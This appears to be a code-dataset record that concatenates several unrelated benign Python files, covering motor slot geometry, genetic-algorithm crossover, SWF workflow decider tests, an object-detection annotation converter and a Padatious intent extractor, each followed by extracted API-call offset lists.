"maya_wizard.export.custom.main",
"maya_wizard.wizard_plugin.update_all",
"maya_wizard.export.modeling.main",
"maya_wizard.export.rigging.main",
"maya_wizard.export.camrig.main",
"maya_wizard.export.camera.main",
"maya_wizard.export.layout.main",
"maya_wizard.export.animation.main"
] | [((117, 144), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (134, 144), False, 'import logging\n'), ((527, 544), 'os.environ.keys', 'os.environ.keys', ([], {}), '()\n', (542, 544), False, 'import os\n'), ((565, 611), 'json.loads', 'json.loads', (["os.environ['wizard_json_settings']"], {}), "(os.environ['wizard_json_settings'])\n", (575, 611), False, 'import json\n'), ((827, 853), 'maya_wizard.wizard_plugin.update_all', 'wizard_plugin.update_all', ([], {}), '()\n', (851, 853), False, 'from maya_wizard import wizard_plugin\n'), ((896, 911), 'maya_wizard.export.modeling.main', 'modeling.main', ([], {}), '()\n', (909, 911), False, 'from maya_wizard.export import modeling\n'), ((954, 968), 'maya_wizard.export.rigging.main', 'rigging.main', ([], {}), '()\n', (966, 968), False, 'from maya_wizard.export import rigging\n'), ((1010, 1023), 'maya_wizard.export.custom.main', 'custom.main', ([], {}), '()\n', (1021, 1023), False, 'from maya_wizard.export import custom\n'), ((1065, 1078), 'maya_wizard.export.camrig.main', 'camrig.main', ([], {}), '()\n', (1076, 1078), False, 'from maya_wizard.export import camrig\n'), ((1120, 1133), 'maya_wizard.export.layout.main', 'layout.main', ([], {}), '()\n', (1131, 1133), False, 'from maya_wizard.export import layout\n'), ((1178, 1232), 'maya_wizard.export.animation.main', 'animation.main', ([], {'nspace_list': 'nspace_list', 'frange': 'frange'}), '(nspace_list=nspace_list, frange=frange)\n', (1192, 1232), False, 'from maya_wizard.export import animation\n'), ((1302, 1353), 'maya_wizard.export.camera.main', 'camera.main', ([], {'nspace_list': 'nspace_list', 'frange': 'frange'}), '(nspace_list=nspace_list, frange=frange)\n', (1313, 1353), False, 'from maya_wizard.export import camera\n')] |
from numpy import arcsin, arctan, cos, exp, array, angle, pi
from numpy import imag as np_imag
from scipy.optimize import fsolve
def _comp_point_coordinate(self):
"""Compute the point coordinates needed to plot the Slot.
Parameters
----------
self : HoleM50
A HoleM50 object
Returns
-------
point_dict: dict
A dict of the slot coordinates
"""
Rext = self.get_Rext()
# magnet pole pitch angle, must be <2*pi/2*p
alpham = 2 * arcsin(self.W0 / (2 * (Rext - self.H1))) # angle (Z9,0,Z9')
Harc = (Rext - self.H1) * (1 - cos(alpham / 2))
# alpha on schematics
gammam = arctan((self.H0 - self.H1 - Harc) / (self.W0 / 2.0 - self.W1 / 2.0))
# betam = pi/2-alpham/2-gammam;#40.5
hssp = pi / self.Zh
x78 = (self.H3 - self.H2) / cos(gammam) # distance from 7 to 8
Z9 = Rext - Harc - self.H1 - 1j * self.W0 / 2
Z8 = Rext - self.H0 - 1j * self.W1 / 2
Z7 = Rext - self.H0 - x78 - 1j * self.W1 / 2
Z1 = (Rext - self.H1) * exp(1j * (-hssp + arcsin(self.W3 / (2 * (Rext - self.H1)))))
Z11 = (Z1 * exp(1j * hssp) + self.H4) * exp(-1j * hssp)
Z10 = (Z9 * exp(1j * hssp) + self.H4) * exp(-1j * hssp)
# Magnet coordinate with Z8 as center and x as the top edge of the magnet
Z8a = -1j * (self.H3 - self.H2)
Z8b = self.W2
Z8c = Z8b + self.W4
Z5 = Z8b - 1j * self.H3
Z4 = Z8c - 1j * self.H3
Z6 = Z5 + 1j * self.H2
Z3 = Z4 + 1j * self.H2
Zmag = array([Z8a, Z8b, Z6, Z5, Z4, Z3, Z8c])
Zmag = Zmag * exp(1j * angle(Z9 - Z8))
Zmag = Zmag + Z8
# final complex numbers Zmag=[Z8b Z6 Z5 Z4 Z3 Z8c]
(Z8a, Z8b, Z6, Z5, Z4, Z3, Z8c) = Zmag
# Rotation so [Z1,Z2] is parallel to the x axis
Z3r, Z1r, Z6r = Z3 * exp(1j * hssp), Z1 * exp(1j * hssp), Z6 * exp(1j * hssp)
# numerical resolution to find the last point Z2
x = fsolve(lambda x: np_imag((Z3r - (Z1r - x)) / (Z6r - Z3r)), self.H3 - self.H2)
Z2 = (Z1r - x[0]) * exp(-1j * hssp)
point_dict = dict()
point_dict["Z1"] = Z1
point_dict["Z2"] = Z2
point_dict["Z3"] = Z3
point_dict["Z4"] = Z4
point_dict["Z5"] = Z5
point_dict["Z6"] = Z6
point_dict["Z7"] = Z7
point_dict["Z8"] = Z8
point_dict["Z9"] = Z9
point_dict["Z10"] = Z10
point_dict["Z11"] = Z11
point_dict["Z8a"] = Z8a
point_dict["Z8b"] = Z8b
point_dict["Z8c"] = Z8c
# Symmetry
point_dict["Z1s"] = Z1.conjugate()
point_dict["Z2s"] = Z2.conjugate()
point_dict["Z3s"] = Z3.conjugate()
point_dict["Z4s"] = Z4.conjugate()
point_dict["Z5s"] = Z5.conjugate()
point_dict["Z6s"] = Z6.conjugate()
point_dict["Z7s"] = Z7.conjugate()
point_dict["Z8s"] = Z8.conjugate()
point_dict["Z9s"] = Z9.conjugate()
point_dict["Z10s"] = Z10.conjugate()
point_dict["Z11s"] = Z11.conjugate()
point_dict["Z8as"] = Z8a.conjugate()
point_dict["Z8bs"] = Z8b.conjugate()
point_dict["Z8cs"] = Z8c.conjugate()
return point_dict
| [
"numpy.arcsin",
"numpy.angle",
"numpy.exp",
"numpy.array",
"numpy.cos",
"numpy.imag",
"numpy.arctan"
] | [((643, 711), 'numpy.arctan', 'arctan', (['((self.H0 - self.H1 - Harc) / (self.W0 / 2.0 - self.W1 / 2.0))'], {}), '((self.H0 - self.H1 - Harc) / (self.W0 / 2.0 - self.W1 / 2.0))\n', (649, 711), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1477, 1515), 'numpy.array', 'array', (['[Z8a, Z8b, Z6, Z5, Z4, Z3, Z8c]'], {}), '([Z8a, Z8b, Z6, Z5, Z4, Z3, Z8c])\n', (1482, 1515), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((490, 530), 'numpy.arcsin', 'arcsin', (['(self.W0 / (2 * (Rext - self.H1)))'], {}), '(self.W0 / (2 * (Rext - self.H1)))\n', (496, 530), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((811, 822), 'numpy.cos', 'cos', (['gammam'], {}), '(gammam)\n', (814, 822), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1122, 1139), 'numpy.exp', 'exp', (['(-1.0j * hssp)'], {}), '(-1.0j * hssp)\n', (1125, 1139), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1182, 1199), 'numpy.exp', 'exp', (['(-1.0j * hssp)'], {}), '(-1.0j * hssp)\n', (1185, 1199), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1977, 1994), 'numpy.exp', 'exp', (['(-1.0j * hssp)'], {}), '(-1.0j * hssp)\n', (1980, 1994), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((587, 602), 'numpy.cos', 'cos', (['(alpham / 2)'], {}), '(alpham / 2)\n', (590, 602), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1757, 1773), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1760, 1773), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1778, 1794), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1781, 1794), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1799, 1815), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1802, 1815), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1892, 1932), 'numpy.imag', 'np_imag', (['((Z3r - (Z1r - x)) / (Z6r - Z3r))'], {}), '((Z3r - (Z1r - x)) / (Z6r - Z3r))\n', (1899, 1932), True, 'from numpy import imag as np_imag\n'), ((1094, 1110), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1097, 1110), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1154, 1170), 'numpy.exp', 'exp', (['(1.0j * hssp)'], {}), '(1.0j * hssp)\n', (1157, 1170), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1543, 1557), 'numpy.angle', 'angle', (['(Z9 - Z8)'], {}), '(Z9 - Z8)\n', (1548, 1557), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n'), ((1035, 1075), 'numpy.arcsin', 'arcsin', (['(self.W3 / (2 * (Rext - self.H1)))'], {}), '(self.W3 / (2 * (Rext - self.H1)))\n', (1041, 1075), False, 'from numpy import arcsin, arctan, cos, exp, array, angle, pi\n')] |
import numpy as np
from abc import ABC, abstractmethod
class _CrossOverBase(ABC):
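    """Base class for crossover operators; stores the problem and its state vector length."""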
def __init__(self, opt_prob):
self._opt_prob = opt_prob
self._length = opt_prob.length
@abstractmethod
def mate(self, p1, p2):
pass
class UniformCrossOver(_CrossOverBase):
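    """Each gene of the child is taken from either parent with equal probability."""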
def __init__(self, opt_prob):
super().__init__(opt_prob)
def mate(self, p1, p2):
bs = np.random.choice(a=[False, True], size=self._length)
child = np.array([0] * self._length)
for i in range(len(bs)):
child[i] = p1[i] if bs[i] else p2[i]
return child
class OnePointCrossOver(_CrossOverBase):
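    """Genes up to and including a random cut point come from p1, the rest from p2."""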
def __init__(self, opt_prob):
super().__init__(opt_prob)
def mate(self, p1, p2):
bs = np.random.randint(self._length)
child = np.array([0] * self._length)
for i in range(self._length):
child[i] = p1[i] if (i<=bs) else p2[i]
return child
class TSPCrossOver(_CrossOverBase):
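    """Tour crossover: copy a random prefix of p1, then append p2's not-yet-visited nodes in order."""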
def __init__(self, opt_prob):
super().__init__(opt_prob)
def mate(self, p1, p2):
if self._length > 1:
_n = np.random.randint(self._length - 1)
child = np.array([0] * self._length)
child[0:_n + 1] = p1[0:_n + 1]
unvisited = [node for node in p2 if node not in p1[0:_n + 1]]
child[_n + 1:] = unvisited
elif np.random.randint(2) == 0:
child = np.copy(p1)
else:
child = np.copy(p2)
return child | [
"numpy.random.choice",
"numpy.array",
"numpy.random.randint",
"numpy.copy"
] | [((406, 458), 'numpy.random.choice', 'np.random.choice', ([], {'a': '[False, True]', 'size': 'self._length'}), '(a=[False, True], size=self._length)\n', (422, 458), True, 'import numpy as np\n'), ((475, 503), 'numpy.array', 'np.array', (['([0] * self._length)'], {}), '([0] * self._length)\n', (483, 503), True, 'import numpy as np\n'), ((761, 792), 'numpy.random.randint', 'np.random.randint', (['self._length'], {}), '(self._length)\n', (778, 792), True, 'import numpy as np\n'), ((809, 837), 'numpy.array', 'np.array', (['([0] * self._length)'], {}), '([0] * self._length)\n', (817, 837), True, 'import numpy as np\n'), ((1131, 1166), 'numpy.random.randint', 'np.random.randint', (['(self._length - 1)'], {}), '(self._length - 1)\n', (1148, 1166), True, 'import numpy as np\n'), ((1187, 1215), 'numpy.array', 'np.array', (['([0] * self._length)'], {}), '([0] * self._length)\n', (1195, 1215), True, 'import numpy as np\n'), ((1386, 1406), 'numpy.random.randint', 'np.random.randint', (['(2)'], {}), '(2)\n', (1403, 1406), True, 'import numpy as np\n'), ((1433, 1444), 'numpy.copy', 'np.copy', (['p1'], {}), '(p1)\n', (1440, 1444), True, 'import numpy as np\n'), ((1479, 1490), 'numpy.copy', 'np.copy', (['p2'], {}), '(p2)\n', (1486, 1490), True, 'import numpy as np\n')] |
import logging
import attr
import boto3
import botocore.stub
import pytest
import decision_tasks
import pyflow
from pyflow import workflow_state as ws
@pytest.fixture
def initialize_logging():
logging.basicConfig()
pyflow.logger.setLevel(logging.INFO)
pytestmark = pytest.mark.usefixtures('initialize_logging')
class StringTransformer(pyflow.Workflow):
NAME = 'StringTransformer'
VERSION = '1.0'
string_upcase = pyflow.LambdaDescriptor('string_upcase')
string_reverse = pyflow.LambdaDescriptor('string_reverse')
subscribe_topic = pyflow.ActivityDescriptor('subscribe_topic_activity', 'v1', task_list='subscription-activities')
string_concat = pyflow.ChildWorkflowDescriptor('StringConcatter', '1.0',
lambda_role='arn:aws:iam::528461152743:role/swf-lambda')
def run(self, workflow_input):
# for loops work. In this case upcased will contain a list of futures
upcased = []
for s in workflow_input:
upcased.append(self.string_upcase(s))
# demonstrate error handling
try:
# pass a number where a string is expected
self.string_upcase(42).result()
assert False, "Shouldn't get to here"
except pyflow.InvocationFailedException:
pass
# list comprehensions as well
reversed_strs = [self.string_reverse(s.result()) for s in upcased]
# Sleep for 5 seconds
self.swf.sleep(5)
# Wait for all futures to finish before proceeding. This normally isn't necessary since just calling result()
# on each future would accomplish the same thing.
self.swf.wait_for_all(reversed_strs)
# Try invoking an activity
subscription = self.subscribe_topic({'email': '<EMAIL>'})
concatted = self.string_concat([s.result() for s in reversed_strs]).result()
subscription.result()
return concatted
class StringConcatter(pyflow.Workflow):
NAME = 'StringConcatter'
VERSION = '1.0'
OPTIONS = {'lambdaRole': 'arn:aws:iam::528461152743:role/swf-lambda'}
def run(self, workflow_input):
return self.swf.invoke_lambda('string_concat', workflow_input).result()
@pytest.fixture
def swf_client():
"""Returns a mock boto3 SWF client. See botocore.stub.Stubber docstring for how to use it"""
return botocore.stub.Stubber(boto3.client('swf'))
@pytest.fixture
def decider(swf_client):
return pyflow.Decider([StringTransformer, StringConcatter],
domain='test-domain', task_list='string-transformer-decider',
identity='string transformer decider', client=swf_client)
@attr.s
class DeciderTestCase(object):
name = attr.ib()
decision_task = attr.ib()
expected_decisions = attr.ib()
process_decision_task_test_cases = [
DeciderTestCase('decision_task00', decision_tasks.decision_task00, [
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda1',
'name': 'string_upcase',
'input': '"Hello"'}
},
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda2',
'name': 'string_upcase',
'input': '" "'}
},
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda3',
'name': 'string_upcase',
'input': '"World"'}
},
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda4',
'name': 'string_upcase',
'input': '42'}
}
]),
# Continued from task00, but lambda2 invocation has completed
DeciderTestCase('decision_task01', decision_tasks.decision_task01, []),
# Now lambda1 has completed, and lambda4 has failed
DeciderTestCase('decision_task02', decision_tasks.decision_task02, [
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda5',
'name': 'string_reverse',
'input': '"HELLO"'}
},
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda6',
'name': 'string_reverse',
'input': '" "'}
}
]),
# Now lambda3 has completed
DeciderTestCase('decision_task03', decision_tasks.decision_task03, [
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda7',
'name': 'string_reverse',
'input': '"WORLD"'}
},
{'decisionType': 'StartTimer',
'startTimerDecisionAttributes': {
'startToFireTimeout': "5",
'timerId': "sleep1"}
}
]),
# lambda5 and lambda6 completed
DeciderTestCase('decision_task04', decision_tasks.decision_task04, []),
# lambda7 completed
DeciderTestCase('decision_task05', decision_tasks.decision_task05, []),
# sleep1 completed
DeciderTestCase('decision_task06', decision_tasks.decision_task06, [
{'decisionType': 'ScheduleActivityTask',
'scheduleActivityTaskDecisionAttributes': {
'activityId': 'activity1',
'activityType': {'name': 'subscribe_topic_activity', 'version': 'v1'},
'input': '{"email": "<EMAIL>"}',
'taskList': {'name': 'subscription-activities'}}
},
{'decisionType': 'StartChildWorkflowExecution',
'startChildWorkflowExecutionDecisionAttributes': {
'workflowId': 'child_workflow1',
'workflowType': {'name': 'StringConcatter', 'version': '1.0'},
'input': '["OLLEH", " ", "DLROW"]',
'lambdaRole': 'arn:aws:iam::528461152743:role/swf-lambda'}
}
]),
# activity1 completed
DeciderTestCase('decision_task07', decision_tasks.decision_task07, []),
# This is the first decision task for the StringConcatter child workflow
DeciderTestCase('decision_task08', decision_tasks.decision_task08, [
{'decisionType': 'ScheduleLambdaFunction',
'scheduleLambdaFunctionDecisionAttributes': {
'id': 'lambda1',
'name': 'string_concat',
'input': '["OLLEH", " ", "DLROW"]'}
}
]),
# In parent, notifies that child workflow started
DeciderTestCase('decision_task09', decision_tasks.decision_task09, []),
# lambda1 in the child workflow completed
DeciderTestCase('decision_task10', decision_tasks.decision_task10, [
{'decisionType': 'CompleteWorkflowExecution',
'completeWorkflowExecutionDecisionAttributes': {
'result': '"OLLEH DLROW"'}
}
]),
# child_workflow1 completed
DeciderTestCase('decision_task11', decision_tasks.decision_task11, [
{'decisionType': 'CompleteWorkflowExecution',
'completeWorkflowExecutionDecisionAttributes': {
'result': '"OLLEH DLROW"'}
}
])
]
@pytest.mark.parametrize('test_case', process_decision_task_test_cases,
ids=[tc.name for tc in process_decision_task_test_cases])
def test_process_decision_task(decider, test_case):
decision_helper = decider.process_decision_task(test_case.decision_task)
assert test_case.expected_decisions == decision_helper.decisions
def test_process_decision_task_cumulative(decider):
"""Like test_process_decision_task, but process all decision tasks in one decider instance"""
for test_case in process_decision_task_test_cases:
decision_helper = decider.process_decision_task(test_case.decision_task)
assert test_case.expected_decisions == decision_helper.decisions, test_case.name
def test_process_decision_task_with_workflow_failure(decider):
decision_helper = decider.process_decision_task(decision_tasks.decision_task02_error)
assert len(decision_helper.decisions) == 1
decision = decision_helper.decisions[0]
assert decision['decisionType'] == 'FailWorkflowExecution'
assert decision['failWorkflowExecutionDecisionAttributes']['reason']
assert decision['failWorkflowExecutionDecisionAttributes']['details']
def test_invalid_workflow_input(decider):
"""Validate correct response to invalid JSON being passed as workflow input"""
# The workflow should fail, but the decider itself shouldn't fail.
decision_helper = decider.process_decision_task(decision_tasks.invalid_workflow_input)
assert decision_helper.decisions[0]['decisionType'] == 'FailWorkflowExecution'
def test_invalid_activity_output(decider):
"""Validate correct response to an activity task returning invalid JSON string"""
# The correct behavior is for the task to fail, but decider and workflow to continue
decision_helper = decider.process_decision_task(decision_tasks.invalid_activity_output)
assert decision_helper.workflow_state.invocation_states['activity1'].state == ws.InvocationState.FAILED
def test_invalid_child_workflow_output(decider):
"Validate correct response to a child workflow returning invalid JSON string"
decision_helper = decider.process_decision_task(decision_tasks.invalid_child_workflow_output)
assert decision_helper.workflow_state.invocation_states['child_workflow1'].state == ws.InvocationState.FAILED
| [
"logging.basicConfig",
"pyflow.logger.setLevel",
"boto3.client",
"pyflow.Decider",
"pyflow.LambdaDescriptor",
"pytest.mark.parametrize",
"pytest.mark.usefixtures",
"pyflow.ActivityDescriptor",
"pyflow.ChildWorkflowDescriptor",
"attr.ib"
] | [((279, 324), 'pytest.mark.usefixtures', 'pytest.mark.usefixtures', (['"""initialize_logging"""'], {}), "('initialize_logging')\n", (302, 324), False, 'import pytest\n'), ((7287, 7420), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""test_case"""', 'process_decision_task_test_cases'], {'ids': '[tc.name for tc in process_decision_task_test_cases]'}), "('test_case', process_decision_task_test_cases, ids=\n [tc.name for tc in process_decision_task_test_cases])\n", (7310, 7420), False, 'import pytest\n'), ((201, 222), 'logging.basicConfig', 'logging.basicConfig', ([], {}), '()\n', (220, 222), False, 'import logging\n'), ((227, 263), 'pyflow.logger.setLevel', 'pyflow.logger.setLevel', (['logging.INFO'], {}), '(logging.INFO)\n', (249, 263), False, 'import pyflow\n'), ((441, 481), 'pyflow.LambdaDescriptor', 'pyflow.LambdaDescriptor', (['"""string_upcase"""'], {}), "('string_upcase')\n", (464, 481), False, 'import pyflow\n'), ((503, 544), 'pyflow.LambdaDescriptor', 'pyflow.LambdaDescriptor', (['"""string_reverse"""'], {}), "('string_reverse')\n", (526, 544), False, 'import pyflow\n'), ((568, 669), 'pyflow.ActivityDescriptor', 'pyflow.ActivityDescriptor', (['"""subscribe_topic_activity"""', '"""v1"""'], {'task_list': '"""subscription-activities"""'}), "('subscribe_topic_activity', 'v1', task_list=\n 'subscription-activities')\n", (593, 669), False, 'import pyflow\n'), ((686, 804), 'pyflow.ChildWorkflowDescriptor', 'pyflow.ChildWorkflowDescriptor', (['"""StringConcatter"""', '"""1.0"""'], {'lambda_role': '"""arn:aws:iam::528461152743:role/swf-lambda"""'}), "('StringConcatter', '1.0', lambda_role=\n 'arn:aws:iam::528461152743:role/swf-lambda')\n", (716, 804), False, 'import pyflow\n'), ((2498, 2679), 'pyflow.Decider', 'pyflow.Decider', (['[StringTransformer, StringConcatter]'], {'domain': '"""test-domain"""', 'task_list': '"""string-transformer-decider"""', 'identity': '"""string transformer decider"""', 'client': 'swf_client'}), "([StringTransformer, StringConcatter], domain='test-domain',\n task_list='string-transformer-decider', identity=\n 'string transformer decider', client=swf_client)\n", (2512, 2679), False, 'import pyflow\n'), ((2775, 2784), 'attr.ib', 'attr.ib', ([], {}), '()\n', (2782, 2784), False, 'import attr\n'), ((2805, 2814), 'attr.ib', 'attr.ib', ([], {}), '()\n', (2812, 2814), False, 'import attr\n'), ((2840, 2849), 'attr.ib', 'attr.ib', ([], {}), '()\n', (2847, 2849), False, 'import attr\n'), ((2423, 2442), 'boto3.client', 'boto3.client', (['"""swf"""'], {}), "('swf')\n", (2435, 2442), False, 'import boto3\n')] |
# INTEL CONFIDENTIAL
#
# Copyright (C) 2021 Intel Corporation
#
# This software and the related documents are Intel copyrighted materials, and
# your use of them is governed by the express license under which they were provided to
# you ("License"). Unless the License provides otherwise, you may not use, modify, copy,
# publish, distribute, disclose or transmit this software or the related documents
# without Intel's prior written permission.
#
# This software and the related documents are provided as is,
# with no express or implied warranties, other than those that are expressly stated
# in the License.
import abc
from typing import Any, List
import numpy as np
from ote_sdk.entities.annotation import (
Annotation,
AnnotationSceneEntity,
AnnotationSceneKind,
)
from ote_sdk.entities.id import ID
from ote_sdk.entities.label import LabelEntity
from ote_sdk.entities.scored_label import ScoredLabel
from ote_sdk.entities.shapes.rectangle import Rectangle
from ote_sdk.utils.time_utils import now
class IPredictionToAnnotationConverter(metaclass=abc.ABCMeta):
@abc.abstractmethod
def convert_to_annotation(self, predictions: Any) -> AnnotationSceneEntity:
"""
Convert raw predictions to AnnotationScene format.
:param predictions: Raw predictions from the model
:return: annotation object containing the shapes
obtained from the raw predictions.
"""
raise NotImplementedError
class DetectionToAnnotationConverter(IPredictionToAnnotationConverter):
"""
Converts Object Detections to Annotations
"""
def __init__(self, labels: List[LabelEntity]):
self.label_map = dict(enumerate(labels))
def convert_to_annotation(self, predictions: np.ndarray) -> AnnotationSceneEntity:
"""
Converts a set of predictions into an AnnotationScene object
:param predictions: Prediction with shape [num_predictions, 6] or
[num_predictions, 7]
Supported detection formats are
* [label, confidence, x1, y1, x2, y2]
* [_, label, confidence, x1, y1, x2, y2]
.. note::
`label` can be any integer that can be mapped to `self.labels`
`confidence` should be a value between 0 and 1
`x1`, `x2`, `y1` and `y2` are expected to be normalized.
:returns AnnotationScene: AnnotationScene Object containing the boxes
obtained from the prediction
"""
annotations = self.__convert_to_annotations(predictions)
# media_identifier = ImageIdentifier(image_id=ID())
annotation_scene = AnnotationSceneEntity(
id=ID(),
kind=AnnotationSceneKind.PREDICTION,
editor="ote",
creation_date=now(),
annotations=annotations,
)
return annotation_scene
def __convert_to_annotations(self, predictions: np.ndarray) -> List[Annotation]:
"""
Converts a list of Detections to OTE SDK Annotation objects
:param predictions: A list of predictions with shape [num_prediction, 6] or
[num_predictions, 7]
:returns: A list of Annotation objects with Rectangle shapes
:raises ValueError: This error is raised if the shape of prediction is not
(n, 7) or (n, 6)
"""
annotations = list()
if predictions.shape[1:] < (6,) or predictions.shape[1:] > (7,):
raise ValueError(
f"Shape of prediction is not expected, expected (n, 7) or (n, 6) "
f"got {predictions.shape}"
)
for prediction in predictions:
if prediction.shape == (7,):
# Some OpenVINO models use an output shape of [7,]
# If this is the case, skip the first value as it is not used
prediction = prediction[1:]
label = int(prediction[0])
confidence = prediction[1]
scored_label = ScoredLabel(self.label_map[label], confidence)
annotations.append(
Annotation(
Rectangle(
prediction[2], prediction[3], prediction[4], prediction[5]
),
labels=[scored_label],
)
)
return annotations
| [
"ote_sdk.utils.time_utils.now",
"ote_sdk.entities.id.ID",
"ote_sdk.entities.shapes.rectangle.Rectangle",
"ote_sdk.entities.scored_label.ScoredLabel"
] | [((4058, 4104), 'ote_sdk.entities.scored_label.ScoredLabel', 'ScoredLabel', (['self.label_map[label]', 'confidence'], {}), '(self.label_map[label], confidence)\n', (4069, 4104), False, 'from ote_sdk.entities.scored_label import ScoredLabel\n'), ((2704, 2708), 'ote_sdk.entities.id.ID', 'ID', ([], {}), '()\n', (2706, 2708), False, 'from ote_sdk.entities.id import ID\n'), ((2811, 2816), 'ote_sdk.utils.time_utils.now', 'now', ([], {}), '()\n', (2814, 2816), False, 'from ote_sdk.utils.time_utils import now\n'), ((4185, 4254), 'ote_sdk.entities.shapes.rectangle.Rectangle', 'Rectangle', (['prediction[2]', 'prediction[3]', 'prediction[4]', 'prediction[5]'], {}), '(prediction[2], prediction[3], prediction[4], prediction[5])\n', (4194, 4254), False, 'from ote_sdk.entities.shapes.rectangle import Rectangle\n')] |
from os.path import join, expanduser
from threading import Lock
from ovos_utils.log import LOG
from ovos_utils.xdg_utils import xdg_data_home
from padatious import IntentContainer
from ovos_plugin_manager.intents import IntentExtractor, IntentPriority, IntentDeterminationStrategy
class PadatiousExtractor(IntentExtractor):
keyword_based = False
def __init__(self, config=None,
strategy=IntentDeterminationStrategy.SEGMENT_REMAINDER,
priority=IntentPriority.MEDIUM_HIGH,
segmenter=None):
super().__init__(config, strategy=strategy,
priority=priority, segmenter=segmenter)
data_dir = expanduser(self.config.get("data_dir", xdg_data_home()))
cache_dir = join(data_dir, "padatious")
self.lock = Lock()
self.container = IntentContainer(cache_dir)
def detach_intent(self, intent_name):
if intent_name in self.registered_intents:
LOG.debug("Detaching padatious intent: " + intent_name)
with self.lock:
self.container.remove_intent(intent_name)
super().detach_intent(intent_name)
def register_entity(self, entity_name, samples=None, reload_cache=True):
samples = samples or [entity_name]
super().register_entity(entity_name, samples)
with self.lock:
self.container.add_entity(entity_name, samples,
reload_cache=reload_cache)
def register_intent(self, intent_name, samples=None, reload_cache=True):
samples = samples or [intent_name]
super().register_intent(intent_name, samples)
with self.lock:
self.container.add_intent(intent_name, samples,
reload_cache=reload_cache)
self.registered_intents.append(intent_name)
def register_entity_from_file(self, entity_name, file_name,
reload_cache=True):
super().register_entity_from_file(entity_name, file_name)
with self.lock:
self.container.load_entity(entity_name, file_name,
reload_cache=reload_cache)
def register_intent_from_file(self, intent_name, file_name,
single_thread=True, timeout=120,
reload_cache=True, force_training=True):
super().register_intent_from_file(intent_name, file_name)
try:
with self.lock:
self.container.load_intent(intent_name, file_name,
reload_cache=reload_cache)
self.registered_intents.append(intent_name)
success = self._train(single_thread=single_thread,
timeout=timeout,
force_training=force_training)
if success:
LOG.debug(file_name + " trained successfully")
else:
LOG.error(file_name + " FAILED TO TRAIN")
except Exception as e:
LOG.exception(e)
def _get_remainder(self, intent, utterance):
if intent["name"] in self.intent_samples:
return self.get_utterance_remainder(
utterance, samples=self.intent_samples[intent["name"]])
return utterance
def calc_intent(self, utterance, min_conf=0.0):
min_conf = min_conf or self.config.get("padatious_min_conf", 0.35)
utterance = utterance.strip().lower()
with self.lock:
intent = self.container.calc_intent(utterance).__dict__
if intent["conf"] < min_conf:
return {"intent_type": "unknown", "entities": {}, "conf": 0,
"intent_engine": "padatious",
"utterance": utterance, "utterance_remainder": utterance}
intent["utterance_remainder"] = self._get_remainder(intent, utterance)
intent["entities"] = intent.pop("matches")
intent["intent_engine"] = "padatious"
intent["intent_type"] = intent.pop("name")
intent["utterance"] = intent.pop("sent")
if isinstance(intent["utterance"], list):
intent["utterance"] = " ".join(intent["utterance"])
return intent
def _train(self, single_thread=True, timeout=120, force_training=True):
with self.lock:
return self.container.train(single_thread=single_thread,
timeout=timeout,
force=force_training,
debug=True)
| [
"threading.Lock",
"os.path.join",
"ovos_utils.log.LOG.error",
"ovos_utils.log.LOG.exception",
"padatious.IntentContainer",
"ovos_utils.xdg_utils.xdg_data_home",
"ovos_utils.log.LOG.debug"
] | [((764, 791), 'os.path.join', 'join', (['data_dir', '"""padatious"""'], {}), "(data_dir, 'padatious')\n", (768, 791), False, 'from os.path import join, expanduser\n'), ((812, 818), 'threading.Lock', 'Lock', ([], {}), '()\n', (816, 818), False, 'from threading import Lock\n'), ((844, 870), 'padatious.IntentContainer', 'IntentContainer', (['cache_dir'], {}), '(cache_dir)\n', (859, 870), False, 'from padatious import IntentContainer\n'), ((977, 1032), 'ovos_utils.log.LOG.debug', 'LOG.debug', (["('Detaching padatious intent: ' + intent_name)"], {}), "('Detaching padatious intent: ' + intent_name)\n", (986, 1032), False, 'from ovos_utils.log import LOG\n'), ((726, 741), 'ovos_utils.xdg_utils.xdg_data_home', 'xdg_data_home', ([], {}), '()\n', (739, 741), False, 'from ovos_utils.xdg_utils import xdg_data_home\n'), ((2926, 2972), 'ovos_utils.log.LOG.debug', 'LOG.debug', (["(file_name + ' trained successfully')"], {}), "(file_name + ' trained successfully')\n", (2935, 2972), False, 'from ovos_utils.log import LOG\n'), ((3007, 3048), 'ovos_utils.log.LOG.error', 'LOG.error', (["(file_name + ' FAILED TO TRAIN')"], {}), "(file_name + ' FAILED TO TRAIN')\n", (3016, 3048), False, 'from ovos_utils.log import LOG\n'), ((3093, 3109), 